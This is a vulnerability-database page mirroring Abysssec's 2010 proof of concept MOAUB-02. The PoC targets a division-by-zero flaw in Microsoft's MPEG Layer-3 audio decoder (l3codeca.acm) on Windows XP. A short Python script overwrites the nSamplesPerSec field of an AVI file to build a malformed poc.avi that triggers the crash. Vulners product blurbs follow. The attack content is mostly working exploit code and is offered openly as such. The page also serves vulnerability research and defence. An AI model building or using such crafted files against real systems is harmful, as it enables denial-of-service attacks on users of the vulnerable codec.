Lucene search
K

Microsoft MPEG Layer-3 Audio Decoder Division

🗓️ 25 Sep 2010 00:00:00Reported by AbysssecType 
zdt
 zdt
🔗 0day.today👁 21 Views

Microsoft MPEG Layer-3 Audio Decoder Division version 1-9-0-306 XP SP2 ñ XP SP3, impact: Med/Hig

Code
=============================================
Microsoft MPEG Layer-3 Audio Decoder Division
=============================================

  Title            :  Microsoft MPEG Layer-3 Audio Decoder Division By Zero
  Version          :  l3codeca.acm 1-9-0-306 (XP SP2 ñ XP SP3)
  Analysis        :  http://www.abysssec.com
  Vendor           :  http://www.microsoft.com
  Impact           :  Med/High
  Contact          :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter          :  @abysssec
  MOAUB Number     :  MOAUB-02
'''
 
import sys
import struct
 
 
def main():
    
    try:
        fdR = open('src.avi', 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:4428]
        nSamplesPerSecField = '\x00\xff\xff\xff'
        str2 = strTotal[4432:]
         
        fdW= open('poc.avi', 'wb+')
        fdW.write(str1)
        fdW.write(nSamplesPerSecField)
        fdW.write(str2)
        fdW.close()
        fdR.close()
        print '[-] AVI file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                 
if __name__ == '__main__':
    main()



#  0day.today [2018-04-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation